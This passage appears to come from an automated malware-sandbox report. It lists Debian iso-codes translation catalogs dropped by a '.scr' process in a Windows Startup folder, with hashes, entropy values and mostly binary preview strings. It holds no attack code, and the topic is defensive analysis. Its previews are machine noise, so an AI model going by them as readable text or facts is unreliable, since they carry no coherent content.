                                                                                                    Preview:................T...9...........p#......q#......}#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......'$......2$......:$......B$......M$......V$......^$......f$......m$......s$......{$.. ....$.......$.......$.. ....$.......$.......%.......%.......%......!%......@%......W%......i%......r%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&....../&..,...K&......x&.......&..%....&.......&.......&.......&.......&.......&.......&.......&.......&.......&..%....'..,...-'.."...Z'..*...}'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......%(......-(......6(......?(......[(..'...i(..$....(.......(.......(.......(.......)......))......G)......L)......T)......[)......i)......z).......).......).......).......).......).......).......).......).......).......).......*.......*.......*......#*......(*......2*......;*......B*......P*......W*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 9 messages, Project-Id-Version: iso_3166-2 'Bol\303\255var'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):858
                                                                                                    Entropy (8bit):5.252204495198591
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:+GpuWy/jXZaE+ALSt0Uh2DUr/utXmGrbnrCwW:vpuXXZaE/L/UwwGou7rCwW
                                                                                                    MD5:8245E90DC59A6F7FB442D0FEDF3F7606
                                                                                                    SHA1:C4F90A462348C60BC44940ED564855DBD11546EC
                                                                                                    SHA-256:EEA595FE73173F60F300B5B8CA17DD2F5860BB3CB0CD0BE8634416B33B3A8382
                                                                                                    SHA-512:80F0A39D1E6BA43B6ED31C07057BDDAB402A0B8048B5441AD547FF6CE5F5D7609EC028CE7F97C6814CF296BFA0D8BD1C3DB0B2B7CFEB0B90F5E24597B079F8A0
                                                                                                    Malicious:false
                                                                                                    Preview:................d...............................................................................!.......-.......................#.......+.......6.......C.......J.......P........................................................Bol.var.Elbasan.Lempira.Luxembourg.Midway Islands.Sikkim.Sucre.Wake Island.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-12-23 17:30+0000.Last-Translator: Rafael Fontenelle <rafaelff@gnome.org>.Language-Team: Portuguese (Brazil) <https://hosted.weblate.org/projects/iso-codes/iso-3166-2/pt_BR/>.Language: pt_BR.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.4.1-dev..Bol.var.Elbasan.Lempira.Luxemburgo.Ilhas Midway.Siquim.Sucre.Ilha Wake.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Territ\303\263rio Brit\303\242nico da Ant\303\241rtida'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2874
                                                                                                    Entropy (8bit):5.231206002689247
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3LSy6ko+vGqIfdvqN5CoUX8vavvesO61PKSPfFFfWu:rLvEko+yaCoPvavvBVKSPNFfn
                                                                                                    MD5:FF6D33023E44A898E0054F95B459B58F
                                                                                                    SHA1:F83AB5BFDEA7D97E62BA4A953939405E97EE84C2
                                                                                                    SHA-256:0C2A56777EB7E49D2264345E85ADD6A6C323A8C6FC85B6A5CD53B0167DF26A8F
                                                                                                    SHA-512:DCEFE66018F1EB19FA115BE9715B2C9A1AD5D56090E0A390F290DA9171A858F5A4D49AC5C5E03D186ECF22A312CD818D4639D16B204482B0854E4592C9A72A47
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................$.......,.......1...(.......Z...8...s...................................&.......'...........9.......X.......o.......}........................... .......................................#... ...4...D.......y...+...............*.......0...........%........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 166 messages, Project-Id-Version: iso_4217 'Unidade de conta ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9032
                                                                                                    Entropy (8bit):4.970389442085518
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TIQmjyYSfFkZVmBmUgyzPA8gkRz2FongBkaTZbtqJVpkS2SILCqKmTFDof52l4Ve:TItbtfmJgyskCwdgjCnMLCk81zM
                                                                                                    MD5:0C002D9F83E1447FD149E03E69913792
                                                                                                    SHA1:05FF7863CB90A9ECA1417ECFA6E2A7995FF90DA2
                                                                                                    SHA-256:E2391F60243B97B83628E61E8736F2EA05F98597399E4E5C3F718F96DCF88FFE
                                                                                                    SHA-512:7455B3EAB42864C1D660ECE6346A67E22393FF745F20A9F723204B7460E2302290027ABCCB788D6621D5A24228E2B71E35E8EDB97891F095CB852DF7B9571699
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......................................$.......3.......A.......O.......a.......q...........................................................1.......3.......9...<...7...v.......................................................................".......2.......H...0...U...............................................................................................................*......./.......E.......T.......f.......u.......z..............................................................................................................."...............>.......N.......^.......c.......h.......v.......}.......................................................................................................................!...............>.......Q.......W.......].......l.......{.......................................................................................#.......-.......>.......L.......\.......e.......t.......y.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 434 messages, Project-Id-Version: iso_639-3 'Abc\303\241zio'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17829
                                                                                                    Entropy (8bit):4.8198723175115505
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:iW+p3mlGp3xRITHO/aQycyiGDfR+/urXINflxSlDIMFM3JK3h4rKX4G8LYyHyp:iWugFrzOlxS72+kvc
                                                                                                    MD5:D1A7E357D96F66B1ADC9E030DB9F4022
                                                                                                    SHA1:D2B60516C814731FD0E0A24C79E5A13DD8613CF7
                                                                                                    SHA-256:C19112B286398B3AE2C92B0703EA967661B07AF1EEF80FD80261494919F2C8DD
                                                                                                    SHA-512:2AE506807C96C9D3675D1A74802BB2E999EF22EDA1562E980AEFEF14C00730541394C57E7069B98444A24C7520F3D9E1078C7DD5ABA8EBE3A18EF4FC99952ACE
                                                                                                    Malicious:false
                                                                                                    Preview:....................K...<.......h$......i$......s$......|$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%.......%......$%......+%......2%......>%......G%......O%......W%......^%......f%......m%......s%......x%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......!&......)&......9&......I&......R&......Y&......b&......j&......s&......|&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'.......'.......'...... '......&'......-'......4'......;'......?'......H'......N'......U'......Z'......`'......f'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(......%(......)(......0(......6(......>(......E(......M(......Q(......X(......w(......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Idiomas afro-asi\303\241ticas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7751
                                                                                                    Entropy (8bit):4.85659434819192
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi207xE86wCYXRSlSE0BfCuXr5VcJHVC/w89DHiEBARjRkducbVbTbL:4SDxm7EW6SE0BfNca/NhARjRRobuo
                                                                                                    MD5:BC58F137ED8D520F10AD9BF0C0002CD7
                                                                                                    SHA1:B3C496FCAFB17706374F6A58EF6631B589A87310
                                                                                                    SHA-256:F6BBEF1F5BFCB29A8017FFD1FD62DFDE02EA4D2DB38D0FCC32B599B24D864E6D
                                                                                                    SHA-512:9E5A497DA033EBE0A5CA5D269D2466B7BC09428D2897B946DB6342E0C4CB118B2F7E3D480CEF01D864A809737360515A14B4B1557370B68056AE9D3BE0759CE7
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................#.......5.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10632
                                                                                                    Entropy (8bit):5.055570997308311
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dKriTgX5AqJltU4WjV9qWxa5hW82TngFl1ps0h1do9Qf3UQxr7DK:+2Og4WjVDxa5hW8KgF7ps0Xdo9Q/U8K
                                                                                                    MD5:70703DED55F1C689560DBF60320ABF09
                                                                                                    SHA1:1DB8225E613E1E5F362EB9DD8E489F420747F8F7
                                                                                                    SHA-256:D616F9E1C4E5F00AFB5C9E8DB11ABE235441EBAAC5A5B43F68507F23297BA249
                                                                                                    SHA-512:FED3E7D16D62C252A16EF9C1EAB8E329C7050F035050428D6F99DC1DC8C492F02E543C114499C6C016C69E3D72784766FF13CBA8F9BA67FA31FAFB0466B1B659
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23486
                                                                                                    Entropy (8bit):5.004401305231662
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosR8fPjmVRVvwE346nbjz5wsWP48WAINiZGynpwvmz6msDApvRJuD6OyN:0oI8fIfvwO48fmsWP48WAIAn6vmz6VD8
                                                                                                    MD5:106BAFEEF85315FCE3E4DC2094F7E4A9
                                                                                                    SHA1:AA1FD3DA095A42999815EC340228991A7EFF2FEF
                                                                                                    SHA-256:F5A74BE33387DD48FE53F5F371F05F132867857A6DB774219D4283CE24D42EFA
                                                                                                    SHA-512:17C7A13DBA9B5EF056A3ED6B2F3C3C49D037D23326FD2593282DE80861F556F0CFB2379C8F72DFA07A28697DB5699BEDF2B3209EB3E8AECC1866FF3DF1CB4B8A
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3776 messages, Project-Id-Version: iso_3166-2 'Regiunea Karas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):229998
                                                                                                    Entropy (8bit):5.418910603868275
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:Aacjzmv07+ydmrSYuVAdkSS+Wlxp9EthsE:WCyC/F4lc2E
                                                                                                    MD5:8B4877C25E9CAA4B0784B01BF8103FD2
                                                                                                    SHA1:C8058BB86F9C787F31E810E1E6279F4E7F4FDD2D
                                                                                                    SHA-256:D802481530EB80A37865F3A4EA97D298C62ED717AD879DFA98D381DB909EC191
                                                                                                    SHA-512:6A24CB96B526C0AA6CB71F3FE187DFD406BD7D46F7D8E846DB0E9DC681A3F03CEFE80AAA45771FAD52C352FE13B50C7CEF732ADB0605FE68F14A140C80E2E2E2
                                                                                                    Malicious:false
                                                                                                    Preview:.................v...............:.......:.......:.......:.......;.......;.......;......);......7;......<;......D;......M;......R;......Z;......z;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......<.......<.......<......!<......1<......7<......A<......P<......a<......p<......v<......|<.......<.......<.......<..+....<.......<.......<.......<.......<.......<.......<.......<.......=...... =......6=......D=......N=......X=......b=......o=......|=.......=.......=.......=.......=.......=.......=.......=.......=.......=.......>.......>.......>......)>......;>......P>......d>......p>......}>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......?.......?......)?......1?......@?......L?......V?......a?......u?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......@.......@.......@.......@......&@......;@......B@......K@......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Teritoriul britanic din Antarctica'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2987
                                                                                                    Entropy (8bit):5.246656991476706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3KpkxDvxI+vGqIfdvqN5CoU55+XgxsXNnw1GiMiQkchDvQ:rLvKpkxD6+yaCo65+XmobvQ
                                                                                                    MD5:887D533B6C368E63C82707ECBA32D7C1
                                                                                                    SHA1:1034CAD13A6D2A1485ED24228A67905B760C6F02
                                                                                                    SHA-256:E9AB7A6833615B93C97FD16EDFC27C486F254EB03BC7DC5935ACB9B00F3086BD
                                                                                                    SHA-512:F44255BD97C0BD48BB28C413D46D31FDDE66DCE0669A3801234E261767A7FE9F4EF50A6EB22F2AB8896C244F427BEF015CB276E4AC9F0A3A6A2780D2DECAAA02
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............?......."...-...+...P...+...|...........0...................................$.......<...*...k...........................................................A... .......b.......x...................+......./...........................;...%...G...-...m................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'Unitatea de cont ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9977
                                                                                                    Entropy (8bit):5.012751164981623
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:b/SHUqFWL1HOyYwLFNF9a7LG3K+aceTNWtKMJtg/2S2SILCDrteyKm65cXR5BdgY:fqFqxJB6VRyK0G/2LCntxH/dgNnF6n
                                                                                                    MD5:926B866614AA585822A4C43CD108EA77
                                                                                                    SHA1:D67644E0CDBBFAAAB1DF8144FFDB10F0DAA76E56
                                                                                                    SHA-256:B8BDCD3E752DEF0A6D3DA366D7DF93AD28EEC4AD63504C53AAED022062E88820
                                                                                                    SHA-512:9B2CE5486FB3CF5D02D1B631DBFC8A6C2D7AD8F79B7F02313AEAB7C1A120B4D232B10BE4A1F1EC3376B11DB6AE2EACC30F070B5C9EC0C735EF43B207CB3A19E5
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 247 messages, Project-Id-Version: iso_639-3 'Abhaz\304\203'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10854
                                                                                                    Entropy (8bit):4.922939236586581
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:01ZqUzHem7ppDDB0VM7zl5BfCbwLscGMPFMBl5t1ZHfXe9V1eoi/vdVQYTCxMllm:KgKem1pDt0VSzl5BfCbwLsoFMX5f5EV1
                                                                                                    MD5:B37E51DEF4DC168234D44FDB26825B58
                                                                                                    SHA1:05897AEEE3B2AA29CA3E6EF7FD277DB211FFFF7C
                                                                                                    SHA-256:3F7431C5326AA942C89EF58AF1BAB6E7168932EAEF10EDAAB2A006100F380070
                                                                                                    SHA-512:0A22B2ACC2E911A669EC9E383AB981EACAE1F0285CDAB1671210F3491872A3AEAEE9C54DAAE89A1A0BFFBEA897AD24CD04E113088DAB3E5697005AC29B5DCF86
                                                                                                    Malicious:false
                                                                                                    Preview:....................K........................................................................................................................... .......(......./.......6.......B.......J.......R.......Z.......a.......l.......u.......{.......................................................................................................................................................".......+.......4.......:.......A.......H.......Q.......W.......^.......d...............................................................................................................................&.......*.......1.......P.......k.......q.......t.......z...................#...................................................................$.......-.......4.......?.......G.......Q.......V.......`.......d.......i.......o...:...z.......................................................................................(.......8.......A.......K.......P.......W.......`.......l.......q.......w.......~...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Limbi afro-asiatice'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10650
                                                                                                    Entropy (8bit):5.065371944842179
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDxytSE0BfNcaXCl2Tpin1NCzxlcYYpeo:XXE0BfNcaXQ2Tpi1NCzjcNH
                                                                                                    MD5:3F155815D3C2159D7521A3F8B13C4009
                                                                                                    SHA1:0CA293209B6B14C80017EF396BFCE44DB789E74E
                                                                                                    SHA-256:1ACD35FDB2EFEED56093A60738131DA3C630C7117340E7A08A4E23E22CDA9B3A
                                                                                                    SHA-512:BF15877641244E2DA9CF60D87D1A19FDC472DD3F52C192E0A2FF3B85F310D366269F8EAE7CEB8B80E51A1C7EA8518A38A32242A257E619DB63D03EBBFDC7FA14
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................#.......7.......f...*...u.../...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 27 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1779
                                                                                                    Entropy (8bit):5.348068384248708
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:LFYnJl14lk/2rlaTxIEpwt9yUrzFeTV3QAf+g:LFo4PYTojyGzQprfZ
                                                                                                    MD5:CE4A6305951F4D4DEDA1580AF799231B
                                                                                                    SHA1:73886F2EE82834B35FBFF2D7536EBB93E4A52F0A
                                                                                                    SHA-256:F008983EAE1B4AEC81106AC9B0B626801E4EF819F500EE88881D19D9EC8EFF7D
                                                                                                    SHA-512:217A32C3E86A0190E1A2477B944F22064C8BD31A03371D1F5391EB45BC6A747AD756FD10ED8F45209DFFC952FEEA1DF146DCA894A15AF4B75449FDEA663D6D65
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........`.......a.......m.......u.......}.......................................................................................................................................................%...............7.......?.......X.......0.......E.......T.......c.......x.......................................................................................+.......:.......K.......V.......e.......z...................................1............................................................................................................................................................Afghanistan.Armenia.Austria.Azerbaijan.Belarus.Bulgaria.Croatia.France.Germany.Hungary.Japan.Kazakhstan.Kyrgyzstan.Latvia.Lithuania.Moldova.Mongolia.Montenegro.Poland.Portugal.Romania.Saint Lucia.Slovakia.Thailand.Ukraine.United States of America.Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2023-03-07 17:40
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\320\220\320\264\320\273\320\260\320\274\321\201\320\272\320\260\321\217'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12713
                                                                                                    Entropy (8bit):5.301835531920759
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:G95MXg4WjVDxa5hW8IGq0aWfXMtBum6pv:GBDxa5IHzi
                                                                                                    MD5:44CC6FB2AD8509E3284C0FE22419E505
                                                                                                    SHA1:C29B93CEA12B40D4F97E8399700D6CEFFC5EC1AD
                                                                                                    SHA-256:0F99E121B66A647562174A3B5822088727ADA347D74BCE92ECAF0A0A7637D6B3
                                                                                                    SHA-512:D5657811985C924A2D9C9A897E59AAAB62B6457B77A32FBB63B3E62A6FCBF55C2B6B740D04042BCD2F8715A4FB4FC24EF64FDFE0FE74FBFBF5C9064CE4AC12A3
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29823
                                                                                                    Entropy (8bit):5.27116183031551
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:sxZbOhzmotmsWP4XWAIbOKnjp9QcTOy0rbMPBS:4h0z9m1jYcSYBS
                                                                                                    MD5:BCFEC9576539E6AAFBD4E590264B876F
                                                                                                    SHA1:24556257531D07CAB1EF840A3031AC94C91AD5F8
                                                                                                    SHA-256:F6993AAD4C6913B23DEA6D77E0F521A4CB1AD1A41D3F27A98E713DC5FBB44208
                                                                                                    SHA-512:5373D9C111A90EC09E69F2B2F7FB1B81C27DE1E634D27857396FEE796151EAC6EF01CEA075563779E95C312D17902EC532965323A80E20827233D22AE734156C
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1938 messages, Project-Id-Version: iso_3166-2 '\320\220\321\200\320\263\320\260\321\203'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):105964
                                                                                                    Entropy (8bit):5.370308057559235
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:NJ4BLZFL4oPvpjQOD1z7CbsEy3uVkq8A4c2F7:PaZVxMbt8u3f4fF
                                                                                                    MD5:D317995157844C1E073B1FADD8910308
                                                                                                    SHA1:BEEC1330F62767C417389156C371A432778B2BA6
                                                                                                    SHA-256:23E47100B308766946A6655034EA20F2426B27E82E1AF16A0FE3618B9478E38E
                                                                                                    SHA-512:8AB00335BA9851DFFBC3602918240586C20248C5424C9A74790E2AFDC28794751178DCDC33271769789C5F77265A86E0CD92D90081606975F7133C0249371E5D
                                                                                                    Malicious:false
                                                                                                    Preview:.................<......<y.................................................................................................$.......*.......>.......H.......L...+...R.......~....................................................................................................'.......3.......H.......R.......\.......g.......o.......y.................................................................................................................(.......8.......P.......].......o.......~..................................................................................................'.......8.......?.......K.......R.......\.......c.......z..........................................................................................................".......*.......3.......;.......@.......I.......\.......j.......x.................................................................................................................................2.......=.......S.......\.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\320\221\321\200\320\270\321\202\320\260\320\275\321\201\320\272\320\260\321\217 \320\220\320\275\321\202\320\260\321\200\320\272\321\202\320\270\321\207\320\265\321\201\320\272\320\260\321\217 \320\242\320\265\321\200\321\200\320\270\321\202\320\276\321\200\320\270\321\217'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3480
                                                                                                    Entropy (8bit):5.51689300235304
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADffO3WvGqIfdvqNuoUohi1hAyjSSgOoMwJcNvyl8ZOSQJsPPcsD+BO:qDfJyBoV2NjK3aW8FQKPPc4f
                                                                                                    MD5:C5099117343800B94B66FB93808F7B52
                                                                                                    SHA1:D82B5D40DAB0DC2CBDF45B6DD1234D25D3AEAEF1
                                                                                                    SHA-256:AA0D0B4A10360D16B416C79E703CC0C33D0AA9E4912A3C8DB652468147FB3DCF
                                                                                                    SHA-512:FAD8645006DB1D6D34000A08D5CDE1C6383212802BD6F8E5EDB088E5AB52567E3BB0B7E72AC2FAAF7D8BB8E2C42DBD599DEFC9AE7738D1B478548F5AFD8D0C04
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................F.......S......._...'...1.......P..............."...........<...#...Z...D...~...V.......H.......-...c...................>...................*...S...D...*.......$.......................B.......O...R...0.......B...............O...*.......z........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 166 messages, Project-Id-Version: iso_4217 '\320\240\320\260\321\201\321\207\321\221\321\202\320\275\320\260\321\217 \320\265\320\264\320\270\320\275\320\270\321\206\320\260 ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11510
                                                                                                    Entropy (8bit):5.257521890276472
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TItbtfmoRsrHn9Vo9vdgjCnMLCkLQPynkTStxPNisJxZAFWYCIYbch2YbkdqYbBC:TIDmHdVwvdgmn2DL5zj0zP/n
                                                                                                    MD5:4135A574E9F7D79BADD19C22B3E687EE
                                                                                                    SHA1:DE4A5E0EC8C6BFF63D79D203DE1079B28D504D42
                                                                                                    SHA-256:2A8D6C92507D78BEAB4DC84E7C38728A3BF9A7545F5A18DDF6AF472602802F80
